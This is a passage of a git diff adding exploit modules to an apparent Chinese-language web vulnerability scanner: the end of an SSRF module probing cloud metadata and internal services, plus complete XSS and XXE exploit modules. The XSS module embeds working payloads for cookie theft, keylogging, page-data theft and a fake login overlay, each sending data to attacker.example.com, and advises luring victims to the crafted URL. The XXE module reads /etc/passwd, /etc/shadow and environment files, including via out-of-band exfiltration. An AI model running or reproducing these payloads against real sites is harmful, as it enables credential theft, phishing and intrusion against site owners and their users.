+                    }
+                    
+        except Exception as e:
+            logger.error(f"尝试访问内部服务时出错: {str(e)}")
+            
+        return None
+        
+    def _try_oast_detection(self, url, parameter, callback_url):
+        """
+        尝试使用OAST（带外应用安全测试）检测SSRF
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            callback_url: 回调URL
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试OAST检测SSRF: {callback_url}")
+            
+            # 构建SSRF测试URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = callback_url
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查回调服务器是否收到请求（假设实现）
+            # 注意：这需要真实的回调服务器实现
+            if hasattr(self, 'check_callback') and self.check_callback(callback_url):
+                logger.info(f"检测到OAST回调，确认SSRF漏洞")
+                return {
+                    'success': True,
+                    'message': '通过OAST成功确认SSRF漏洞',
+                    'data': {
+                        'callback_url': callback_url,
+                        'parameter': parameter
+                    },
+                    'poc': new_url
+                }
+                
+        except Exception as e:
+            logger.error(f"尝试OAST检测时出错: {str(e)}")
+            
+        return None
+        
+    def _get_service_indicators(self, target_url):
+        """
+        获取目标服务的特征指标
+        
+        Args:
+            target_url: 目标服务URL
+            
+        Returns:
+            list: 特征指标列表
+        """
+        indicators = []
+        
+        # 提取主机和路径
+        try:
+            parsed_url = urllib.parse.urlparse(target_url)
+            host = parsed_url.netloc.split(':')[0]
+            path = parsed_url.path
+            
+            # AWS元数据服务特征
+            if host == '169.254.169.254':
+                indicators = ['ami-id', 'instance-id', 'instance-type', 'local-hostname', 
+                             'local-ipv4', 'public-hostname', 'public-ipv4', 'security-credentials']
+                             
+            # GCP元数据服务特征
+            elif host == 'metadata.google.internal':
+                indicators = ['instance', 'attributes', 'service-accounts', 'project', 
+                             'hostname', 'image', 'machine-type']
+                             
+            # Azure元数据服务特征
+            elif host == '169.254.169.254' and 'metadata' in path:
+                indicators = ['vmId', 'compute', 'network', 'osType', 'location', 
+                             'resourceGroupName', 'apiVersion']
+                             
+            # 阿里云元数据服务特征
+            elif host == '100.100.100.200':
+                indicators = ['instance-id', 'region-id', 'zone-id', 'vpc-id', 
+                             'private-ipv4']
+                             
+            # Redis服务特征
+            elif host == '127.0.0.1' and '6379' in target_url:
+                indicators = ['redis_version', 'connected_clients', 'PONG', 'ERR', 
+                             'NOAUTH', 'AUTH']
+                             
+            # MySQL服务特征
+            elif host == '127.0.0.1' and '3306' in target_url:
+                indicators = ['mysql', 'SQL', 'MariaDB', 'syntax', 'Access denied', 
+                             'error', 'server version']
+                             
+            # Elasticsearch服务特征
+            elif host == '127.0.0.1' and ('9200' in target_url or 'elasticsearch' in target_url):
+                indicators = ['cluster_name', 'nodes', 'shards', 'indices', 'lucene_version', 
+                             'version', 'elasticsearch']
+                             
+            # MongoDB服务特征
+            elif host == '127.0.0.1' and '27017' in target_url:
+                indicators = ['mongodb', 'databases', 'collections', 'command', 
+                             'assertion', 'not authorized']
+                             
+            # Docker API特征
+            elif host == '127.0.0.1' and ('2375' in target_url or 'docker' in target_url):
+                indicators = ['containers', 'images', 'volumes', 'version', 
+                             'docker', 'Config', 'Id', 'Name']
+                             
+            # Web服务器标识
+            else:
+                indicators = ['apache', 'nginx', 'iis', 'server', 'web server', 'title', 
+                             'html', 'body', 'login', 'admin', 'index', 'welcome', 
+                             '404', '403', '401', '500', 'error', 'not found', 'forbidden']
+                             
+        except Exception as e:
+            logger.error(f"获取服务特征指标时出错: {str(e)}")
+            
+        return indicators 
\ No newline at end of file
diff --git a/xss_scanner/exploits/xss_exploit.py b/xss_scanner/exploits/xss_exploit.py
new file mode 100644
index 0000000..9921193
--- /dev/null
+++ b/xss_scanner/exploits/xss_exploit.py
@@ -0,0 +1,248 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS漏洞利用模块，负责利用发现的XSS漏洞
+"""
+
+import logging
+import random
+import string
+import base64
+from urllib.parse import urlencode, urlparse, parse_qsl
+
+logger = logging.getLogger('xss_scanner')
+
+class XSSExploit:
+    """XSS漏洞利用类，负责利用XSS漏洞执行特定操作"""
+    
+    def __init__(self, http_client):
+        """
+        初始化XSS漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        self.exploit_id = self._generate_random_string(8)
+        
+        # 常用的XSS利用载荷
+        self.cookie_steal_payload = f"""<script>
+new Image().src="http://attacker.example.com/steal.php?cookie="+encodeURIComponent(document.cookie)+"&location="+encodeURIComponent(window.location)+"&id={self.exploit_id}";
+</script>"""
+
+        self.keylogger_payload = f"""<script>
+document.addEventListener('keydown', function(e) {{
+    var xhr = new XMLHttpRequest();
+    xhr.open('GET', 'http://attacker.example.com/log.php?key='+e.key+'&id={self.exploit_id}', true);
+    xhr.send();
+}});
+</script>"""
+
+        self.session_hijack_payload = f"""<script>
+var xhr = new XMLHttpRequest();
+xhr.open('GET', '/profile', true);
+xhr.onload = function() {{
+    var content = this.responseText;
+    var xhr2 = new XMLHttpRequest();
+    xhr2.open('GET', 'http://attacker.example.com/steal.php?data='+encodeURIComponent(content)+'&id={self.exploit_id}', true);
+    xhr2.send();
+}};
+xhr.send();
+</script>"""
+
+        self.phishing_payload = f"""<div style="position:fixed;top:0;left:0;width:100%;height:100%;background-color:white;z-index:9999;">
+<h2 style="text-align:center;margin-top:20px;">您的会话已过期</h2>
+<p style="text-align:center;">请重新登录以继续</p>
+<form style="width:300px;margin:0 auto;" onsubmit="sendCredentials(event)">
+<p><input type="text" name="username" placeholder="用户名" style="width:100%;padding:10px;margin:10px 0;"></p>
+<p><input type="password" name="password" placeholder="密码" style="width:100%;padding:10px;margin:10px 0;"></p>
+<p><button type="submit" style="width:100%;padding:10px;background-color:#4CAF50;color:white;border:none;">登录</button></p>
+</form>
+<script>
+function sendCredentials(e) {{
+    e.preventDefault();
+    var u = document.querySelector('input[name="username"]').value;
+    var p = document.querySelector('input[name="password"]').value;
+    var xhr = new XMLHttpRequest();
+    xhr.open('GET', 'http://attacker.example.com/phish.php?u='+encodeURIComponent(u)+'&p='+encodeURIComponent(p)+'&id={self.exploit_id}', true);
+    xhr.onload = function() {{
+        window.location = '/login';
+    }};
+    xhr.send();
+}}
+</script>
+</div>"""
+    
+    def exploit(self, vulnerability):
+        """
+        利用XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        if vulnerability['type'] != 'XSS':
+            logger.warning(f"漏洞类型不匹配，预期XSS，实际为{vulnerability['type']}")
+            return None
+            
+        logger.info(f"尝试利用XSS漏洞: {vulnerability['url']}")
+        
+        # 根据漏洞子类型选择不同的利用方式
+        if vulnerability['subtype'] == 'Reflected XSS':
+            return self._exploit_reflected_xss(vulnerability)
+        elif vulnerability['subtype'] == 'Stored XSS':
+            return self._exploit_stored_xss(vulnerability)
+        elif vulnerability['subtype'] == 'DOM XSS':
+            return self._exploit_dom_xss(vulnerability)
+        else:
+            logger.warning(f"未知的XSS漏洞子类型: {vulnerability['subtype']}")
+            return None
+    
+    def _exploit_reflected_xss(self, vulnerability):
+        """
+        利用反射型XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        # 获取漏洞URL和参数
+        url = vulnerability['url']
+        parameter = vulnerability['parameter']
+        
+        # 构建利用载荷
+        payloads = [
+            self.cookie_steal_payload,
+            self.keylogger_payload,
+            self.session_hijack_payload,
+            self.phishing_payload
+        ]
+        
+        # 随机选择一个载荷进行利用
+        payload = random.choice(payloads)
+        
+        # 构建利用URL
+        parsed_url = urlparse(url)
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        if parameter in query_params:
+            query_params[parameter] = payload
+            
+            # 构建利用URL
+            exploit_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{urlencode(query_params)}"
+            
+            logger.info(f"生成XSS利用URL: {exploit_url}")
+            
+            return {
+                'type': 'XSS_EXPLOIT',
+                'exploit_type': '反射型XSS漏洞利用',
+                'url': exploit_url,
+                'payload': payload,
+                'description': f"反射型XSS漏洞利用成功，可以通过URL诱导用户访问触发XSS。",
+                'recommendation': "诱导用户访问该URL，然后等待回连数据。"
+            }
+        
+        return None
+    
+    def _exploit_stored_xss(self, vulnerability):
+        """
+        利用存储型XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        # 获取漏洞表单提交信息
+        url = vulnerability['url']
+        form_action = vulnerability.get('form_action', url)
+        form_method = vulnerability.get('form_method', 'POST')
+        parameter = vulnerability['parameter']
+        
+        # 构建利用载荷
+        payload = self.cookie_steal_payload
+        
+        # 构建表单数据
+        form_data = {
+            parameter: payload
+        }
+        
+        logger.info(f"尝试提交存储型XSS利用载荷到: {form_action}")
+        
+        # 提交表单
+        try:
+            if form_method.upper() == 'POST':
+                response = self.http_client.post(form_action, data=form_data)
+            else:
+                response = self.http_client.get(form_action, params=form_data)
+                
+            if response and response.status_code < 400:
+                return {
+                    'type': 'XSS_EXPLOIT',
+                    'exploit_type': '存储型XSS漏洞利用',
+                    'url': form_action,
+                    'payload': payload,
+                    'description': f"存储型XSS漏洞利用成功，XSS Payload已经注入到目标站点，将在用户访问时触发。",
+                    'recommendation': "等待用户访问包含存储型XSS的页面，然后接收回连数据。"
+                }
+        except Exception as e:
+            logger.error(f"利用存储型XSS漏洞时发生错误: {str(e)}")
+            
+        return None
+    
+    def _exploit_dom_xss(self, vulnerability):
+        """
+        利用DOM型XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        # DOM型XSS通常涉及到URL片段（hash）或特定参数
+        url = vulnerability['url']
+        parameter = vulnerability.get('parameter', 'fragment')
+        
+        # 构建利用载荷
+        payload = self.cookie_steal_payload
+        
+        # 如果是URL片段，直接添加到URL末尾
+        if parameter == 'fragment':
+            exploit_url = f"{url}#{payload}"
+        else:
+            # 否则作为URL参数
+            parsed_url = urlparse(url)
+            query_params = dict(parse_qsl(parsed_url.query))
+            query_params[parameter] = payload
+            exploit_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{urlencode(query_params)}"
+        
+        logger.info(f"生成DOM XSS利用URL: {exploit_url}")
+        
+        return {
+            'type': 'XSS_EXPLOIT',
+            'exploit_type': 'DOM型XSS漏洞利用',
+            'url': exploit_url,
+            'payload': payload,
+            'description': f"DOM型XSS漏洞利用成功，可以通过URL触发客户端XSS。",
+            'recommendation': "诱导用户访问该URL，然后等待回连数据。"
+        }
+    
+    def _generate_random_string(self, length=8):
+        """
+        生成随机字符串
+        
+        Args:
+            length: 字符串长度
+            
+        Returns:
+            str: 随机字符串
+        """
+        chars = string.ascii_letters + string.digits
+        return ''.join(random.choice(chars) for _ in range(length)) 
\ No newline at end of file
diff --git a/xss_scanner/exploits/xxe_exploit.py b/xss_scanner/exploits/xxe_exploit.py
new file mode 100644
index 0000000..5ad1f89
--- /dev/null
+++ b/xss_scanner/exploits/xxe_exploit.py
@@ -0,0 +1,532 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XXE（XML外部实体注入）漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+import random
+import string
+import base64
+import time
+import xml.dom.minidom
+
+logger = logging.getLogger('xss_scanner')
+
+class XXEExploit:
+    """XXE漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化XXE漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # XXE有效载荷模板
+        self.xxe_payloads = {
+            # 基本文件读取
+            "file_read": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY xxe SYSTEM "file:///{file_path}" >]>
+<foo>&xxe;</foo>""",
+            
+            # 带外数据泄露 (OOB)
+            "oob_exfiltration": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY % file SYSTEM "file:///{file_path}">
+<!ENTITY % dtd SYSTEM "{callback_server}/xxe.dtd">
+%dtd;
+]>
+<foo>&send;</foo>""",
+            
+            # 错误诱导泄露
+            "error_based": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY % file SYSTEM "file:///{file_path}">
+<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+%eval;
+%error;
+]>
+<foo>Error Based XXE</foo>""",
+            
+            # PHP过滤器
+            "php_filter": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={file_path}" >]>
+<foo>&xxe;</foo>""",
+            
+            # 参数实体
+            "parameter_entity": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY % xxe SYSTEM "file:///{file_path}" >
+%xxe;
+]>
+<foo>Parameter Entity XXE</foo>""",
+            
+            # SOAP注入
+            "soap_xxe": """<?xml version="1.0" encoding="UTF-8"?>
+<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
+<!DOCTYPE foo [
+<!ENTITY xxe SYSTEM "file:///{file_path}" >]>
+<soap:Body><foo>&xxe;</foo></soap:Body>
+</soap:Envelope>""",
+            
+            # SVG注入
+            "svg_xxe": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE svg [ 
+<!ENTITY xxe SYSTEM "file:///{file_path}" >]>
+<svg width="100" height="100">
+    <text x="10" y="20">&xxe;</text>
+</svg>"""
+        }
+        
+        # XXE DTD内容模板
+        self.xxe_dtd_template = """<!ENTITY % file SYSTEM "file:///{file_path}">
+<!ENTITY % combined "<!ENTITY send SYSTEM '{callback_server}?data=%file;'>">
+%combined;"""
+        
+        # 敏感文件列表
+        self.sensitive_files = [
+            "/etc/passwd",
+            "/etc/hosts",
+            "/etc/shadow",
+            "/etc/group",
+            "/etc/issue",
+            "/etc/motd",
+            "/proc/self/environ",
+            "/proc/version",
+            "/proc/cmdline",
+            "C:/Windows/win.ini",
+            "C:/boot.ini",
+            "C:/Windows/System32/drivers/etc/hosts"
+        ]
+        
+    def exploit(self, vulnerability):
+        """
+        利用XXE漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用XXE漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        form_action = vulnerability.get('form_action')
+        form_method = vulnerability.get('form_method', 'POST')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+            
+        # 尝试读取敏感文件
+        for file_path in self.sensitive_files[:5]:  # 只尝试前5个文件
+            result = self._read_file_via_xxe(url, parameter, file_path, form_action, form_method)
+            if result and result['success']:
+                return result
+                
+        # 生成随机回调标识符
+        callback_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
+        callback_server = f"http://xxe-callback-{callback_id}.example.com"
+        
+        # 如果没有成功读取文件，提供OOB XXE的步骤
+        return {
+            'success': False,
+            'message': '无法通过本地测试确认XXE漏洞，请尝试带外(OOB)XXE测试',
+            'data': {
+                'parameter': parameter,
+                'url': url,
+                'oob_details': {
+                    'callback_id': callback_id,
+                    'callback_server': callback_server
+                }
+            },
+            'manual_steps': [
+                "1. 设置一个你控制的Web服务器，托管以下DTD文件:",
+                self.xxe_dtd_template.format(file_path="/etc/passwd", callback_server=callback_server),
+                "2. 确保该DTD文件可通过HTTP/HTTPS访问，例如: http://your-server.com/xxe.dtd",
+                "3. 构造XXE payload:",
+                self.xxe_payloads["oob_exfiltration"].format(file_path="/etc/passwd", callback_server="http://your-server.com"),
+                "4. 将此payload注入到目标参数中",
+                "5. 如果你的服务器收到包含/etc/passwd内容的回调请求，则确认存在XXE漏洞"
+            ],
+            'poc': self.xxe_payloads["file_read"].format(file_path="/etc/passwd")
+        }
+        
+    def _read_file_via_xxe(self, url, parameter, file_path, form_action=None, form_method=None):
+        """
+        通过XXE读取文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            file_path: 要读取的文件路径
+            form_action: 表单操作URL
+            form_method: 表单方法
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试通过XXE读取文件: {file_path}")
+            
+            # 生成XXE有效载荷
+            xxe_payload = self.xxe_payloads["file_read"].format(file_path=file_path)
+            
+            # 如果表单操作和方法都存在，使用表单提交
+            if form_action and form_method:
+                return self._exploit_via_form(url, parameter, xxe_payload, file_path, form_action, form_method)
+            else:
+                return self._exploit_via_url(url, parameter, xxe_payload, file_path)
+                
+        except Exception as e:
+            logger.error(f"尝试利用XXE漏洞时出错: {str(e)}")
+            return None
+            
+    def _exploit_via_form(self, url, parameter, xxe_payload, file_path, form_action, form_method):
+        """
+        通过表单提交利用XXE漏洞
+        
+        Args:
+            url: 目标页面URL
+            parameter: 参数名
+            xxe_payload: XXE有效载荷
+            file_path: 要读取的文件路径
+            form_action: 表单操作URL
+            form_method: 表单方法
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            form_data = {parameter: xxe_payload}
+            
+            # 设置请求头
+            headers = {
+                'Content-Type': 'application/xml',
+                'Accept': '*/*'
+            }
+            
+            # 提交表单
+            if form_method.upper() == 'POST':
+                response = self.http_client.post(form_action, data=form_data, headers=headers)
+            else:
+                response = self.http_client.get(form_action, params=form_data, headers=headers)
+                
+            # 检查响应是否包含文件内容特征
+            if response and response.status_code == 200:
+                extracted_content = self._extract_file_content(response.text, file_path)
+                if extracted_content:
+                    logger.info(f"成功通过XXE读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用XXE漏洞读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'file_content': extracted_content[:1000] + ('...' if len(extracted_content) > 1000 else ''),
+                            'full_content_length': len(extracted_content)
+                        },
+                        'poc': xxe_payload
+                    }
+                    
+        except Exception as e:
+            logger.error(f"通过表单提交XXE有效载荷时出错: {str(e)}")
+            
+        return None
+        
+    def _exploit_via_url(self, url, parameter, xxe_payload, file_path):
+        """
+        通过URL参数利用XXE漏洞
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            xxe_payload: XXE有效载荷
+            file_path: 要读取的文件路径
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            # 构建包含XXE有效载荷的URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = xxe_payload
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 设置请求头
+            headers = {
+                'Content-Type': 'application/xml',
+                'Accept': '*/*'
+            }
+            
+            # 发送请求
+            response = self.http_client.get(new_url, headers=headers)
+            
+            # 检查响应是否包含文件内容特征
+            if response and response.status_code == 200:
+                extracted_content = self._extract_file_content(response.text, file_path)
+                if extracted_content:
+                    logger.info(f"成功通过XXE读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用XXE漏洞读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'file_content': extracted_content[:1000] + ('...' if len(extracted_content) > 1000 else ''),
+                            'full_content_length': len(extracted_content)
+                        },
+                        'poc': new_url
+                    }
+                    
+            # 尝试使用POST方法
+            post_headers = {
+                'Content-Type': 'application/xml',
+                'Accept': '*/*'
+            }
+            post_response = self.http_client.post(url, data=xxe_payload, headers=post_headers)
+            
+            if post_response and post_response.status_code == 200:
+                extracted_content = self._extract_file_content(post_response.text, file_path)
+                if extracted_content:
+                    logger.info(f"成功通过POST XXE读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用XXE漏洞（POST方法）读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'file_content': extracted_content[:1000] + ('...' if len(extracted_content) > 1000 else ''),
+                            'full_content_length': len(extracted_content)
+                        },
+                        'poc': xxe_payload,
+                        'method': 'POST',
+                        'target_url': url
+                    }
+                    
+        except Exception as e:
+            logger.error(f"通过URL参数利用XXE漏洞时出错: {str(e)}")
+            
+        return None
+        
+    def _extract_file_content(self, response_text, file_path):
+        """
+        从响应中提取文件内容
+        
+        Args:
+            response_text: 响应文本
+            file_path: 尝试访问的文件路径
+            
+        Returns:
+            str: 提取的文件内容，如果未找到返回None
+        """
+        # 根据文件类型识别特征
+        if '/etc/passwd' in file_path:
+            # 查找/etc/passwd文件特征
+            if re.search(r"root:.*:0:0:", response_text):
+                # 提取完整的passwd文件内容
+                passwd_lines = re.findall(r"([a-z_][a-z0-9_-]*:[^:]*:[0-9]*:[0-9]*:[^:]*:[^:]*:[^\n]*)", response_text)
+                if passwd_lines:
+                    return "\n".join(passwd_lines)
+                    
+        elif '/etc/hosts' in file_path:
+            # 查找/etc/hosts文件特征
+            if re.search(r"127\.0\.0\.1\s+localhost", response_text):
+                # 提取完整的hosts文件内容
+                hosts_content = re.search(r"(127\.0\.0\.1\s+localhost.*?)(</|\n\n|$)", response_text, re.DOTALL)
+                if hosts_content:
+                    return hosts_content.group(1)
+                    
+        elif 'win.ini' in file_path.lower():
+            # 查找win.ini文件特征
+            if re.search(r"\[fonts\]|\[extensions\]", response_text, re.IGNORECASE):
+                # 提取完整的win.ini文件内容
+                win_ini_content = re.search(r"(\[fonts\].*?)(</|\n\n|$)", response_text, re.DOTALL | re.IGNORECASE)
+                if win_ini_content:
+                    return win_ini_content.group(1)
+                    
+        # 检查是否包含Base64编码的内容
+        base64_pattern = r"([A-Za-z0-9+/]{20,}={0,2})"
+        matches = re.findall(base64_pattern, response_text)
+        for match in matches:
+            try:
+                # 尝试解码
+                decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
+                
+                # 检查解码后的内容是否包含敏感信息
+                if (re.search(r"root:.*:0:0:", decoded) or 
+                    re.search(r"127\.0\.0\.1\s+localhost", decoded) or
+                    re.search(r"\[fonts\]|\[extensions\]", decoded, re.IGNORECASE)):
+                    return decoded
+                    
+            except Exception:
+                continue
+                
+        # 通用文件内容检测
+        # 如果响应文本长度超过一定阈值，且不包含HTML标签，可能是文件内容
+        if len(response_text) > 20 and not re.search(r"<!DOCTYPE html>|<html|<body|<head", response_text, re.IGNORECASE):
+            # 去除可能的XML标签
+            clean_text = re.sub(r"<[^>]+>", "", response_text)
+            if len(clean_text.strip()) > 0:
+                return clean_text
+                
+        return None
+        
+    def _try_php_filter(self, url, parameter, file_path, form_action=None, form_method=None):
+        """
+        尝试使用PHP过滤器
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            file_path: 要读取的文件路径
+            form_action: 表单操作URL
+            form_method: 表单方法
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试使用PHP过滤器读取文件: {file_path}")
+            
+            # 生成PHP过滤器XXE有效载荷
+            xxe_payload = self.xxe_payloads["php_filter"].format(file_path=file_path)
+            
+            # 如果表单操作和方法都存在，使用表单提交
+            if form_action and form_method:
+                result = self._exploit_via_form(url, parameter, xxe_payload, file_path, form_action, form_method)
+            else:
+                result = self._exploit_via_url(url, parameter, xxe_payload, file_path)
+                
+            return result
+                
+        except Exception as e:
+            logger.error(f"尝试使用PHP过滤器时出错: {str(e)}")
+            return None
+            
+    def _try_oob_xxe(self, url, parameter, file_path, callback_server, form_action=None, form_method=None):
+        """
+        尝试使用带外(OOB) XXE
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            file_path: 要读取的文件路径
+            callback_server: 回调服务器URL
+            form_action: 表单操作URL
+            form_method: 表单方法
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试使用带外(OOB) XXE读取文件: {file_path}")
+            
+            # 生成OOB XXE有效载荷
+            xxe_payload = self.xxe_payloads["oob_exfiltration"].format(
+                file_path=file_path,
+                callback_server=callback_server
+            )
+            
+            # 如果表单操作和方法都存在，使用表单提交
+            if form_action and form_method:
+                form_data = {parameter: xxe_payload}
+                
+                # 设置请求头
+                headers = {
+                    'Content-Type': 'application/xml',
+                    'Accept': '*/*'
+                }
+                
+                # 提交表单
+                if form_method.upper() == 'POST':
+                    self.http_client.post(form_action, data=form_data, headers=headers)
+                else:
+                    self.http_client.get(form_action, params=form_data, headers=headers)
+            else:
+                # 构建包含XXE有效载荷的URL
+                parsed_url = urllib.parse.urlparse(url)
+                query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+                query_params[parameter] = xxe_payload
+                
+                # 重建查询字符串
+                new_query = urllib.parse.urlencode(query_params)
+                new_url = urllib.parse.urlunparse((
+                    parsed_url.scheme,
+                    parsed_url.netloc,
+                    parsed_url.path,
+                    parsed_url.params,
+                    new_query,
+                    parsed_url.fragment
+                ))
+                
+                # 设置请求头
+                headers = {
+                    'Content-Type': 'application/xml',
+                    'Accept': '*/*'
+                }
+                
+                # 发送请求
+                self.http_client.get(new_url, headers=headers)
+                
+            # 等待回调服务器响应
+            # 注意：在实际环境中，这需要回调服务器的实现
+            time.sleep(2)
+            
+            # 检查回调是否收到
+            # 这里假设有一个check_callback方法
+            if hasattr(self, 'check_callback') and self.check_callback(callback_server):
+                logger.info(f"成功通过OOB XXE获取文件内容: {file_path}")
+                return {
+                    'success': True,
+                    'message': f'成功通过带外(OOB) XXE读取文件: {file_path}',
+                    'data': {
+                        'file_path': file_path,
+                        'callback_server': callback_server
+                    },
+                    'poc': xxe_payload
+                }
+                
+        except Exception as e:
+            logger.error(f"尝试使用带外(OOB) XXE时出错: {str(e)}")
+            
+        return None
+        
+    def _prettify_xml(self, xml_string):
+        """
+        美化XML字符串
+        
+        Args:
+            xml_string: XML字符串
+            
+        Returns:
+            str: 美化后的XML字符串
+        """
+        try:
+            dom = xml.dom.minidom.parseString(xml_string)
+            pretty_xml = dom.toprettyxml()
+            return pretty_xml
+        except Exception:
+            return xml_string 
\ No newline at end of file
diff --git a/xss_scanner/main.py b/xss_scanner/main.py
new file mode 100644
index 0000000..2c66126
--- /dev/null
+++ b/xss_scanner/main.py
@@ -0,0 +1,135 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS 深度漏洞扫描器
+作者: 高级渗透工程师
+版本: 1.0.0
+描述: 一个全面的XSS漏洞扫描工具，能够扫描多种平台的XSS漏洞，并提供其他漏洞的辅助扫描功能
+"""
+
+import sys
+import os
+import argparse
+import time
+import logging
+from datetime import datetime
+
+# 导入内部模块
+from xss_scanner.core.scanner_engine import ScannerEngine
+from xss_scanner.core.config import Config
+from xss_scanner.core.logger import setup_logger
+from xss_scanner.ui.cli import display_banner, display_progress, display_results
+from xss_scanner.utils.validator import validate_target
+
+def parse_arguments():
+    """解析命令行参数"""
+    parser = argparse.ArgumentParser(description='XSS 深度漏洞扫描器')
+    parser.add_argument('-u', '--url', help='目标URL')
+    parser.add_argument('-f', '--file', help='包含目标URL的文件')
+    parser.add_argument('-d', '--depth', type=int, default=2, help='爬虫深度 (默认: 2)')
+    parser.add_argument('-t', '--threads', type=int, default=5, help='线程数 (默认: 5)')
+    parser.add_argument('--timeout', type=int, default=10, help='请求超时时间，单位秒 (默认: 10)')
+    parser.add_argument('--user-agent', help='自定义User-Agent')
+    parser.add_argument('--cookie', help='请求Cookie')
+    parser.add_argument('--headers', help='自定义HTTP头，格式: "Header1:Value1;Header2:Value2"')
+    parser.add_argument('--proxy', help='HTTP代理，格式: http://user:pass@host:port')
+    parser.add_argument('--scan-level', type=int, choices=[1, 2, 3], default=2, 
+                        help='扫描级别: 1-快速, 2-标准, 3-深度 (默认: 2)')
+    parser.add_argument('--scan-type', choices=['all', 'xss', 'csrf', 'sqli', 'lfi', 'rfi', 'ssrf', 'xxe'], 
+                        default='all', help='扫描类型 (默认: all)')
+    parser.add_argument('--payload-level', type=int, choices=[1, 2, 3], default=2,
+                        help='Payload复杂度: 1-基础, 2-标准, 3-高级 (默认: 2)')
+    parser.add_argument('-o', '--output', help='输出报告文件路径')
+    parser.add_argument('--format', choices=['txt', 'html', 'json', 'xml'], default='html',
+                        help='报告输出格式 (默认: html)')
+    parser.add_argument('-v', '--verbose', action='store_true', help='显示详细输出')
+    parser.add_argument('--no-color', action='store_true', help='禁用彩色输出')
+    
+    # 高级选项
+    advanced_group = parser.add_argument_group('高级选项')
+    advanced_group.add_argument('--browser', action='store_true', help='使用真实浏览器进行扫描')
+    advanced_group.add_argument('--exploit', action='store_true', help='尝试利用发现的漏洞')
+    advanced_group.add_argument('--custom-payloads', help='自定义Payload文件路径')
+    advanced_group.add_argument('--exclude', help='排除URL模式 (正则表达式)')
+    advanced_group.add_argument('--include', help='仅包含URL模式 (正则表达式)')
+    advanced_group.add_argument('--auth', help='基本认证，格式: username:password')
+    
+    return parser.parse_args()
+
+def main():
+    """主函数"""
+    # 显示Banner
+    display_banner()
+    
+    # 解析命令行参数
+    args = parse_arguments()
+    
+    # 配置日志
+    log_level = logging.DEBUG if args.verbose else logging.INFO
+    logger = setup_logger(log_level, args.no_color)
+    
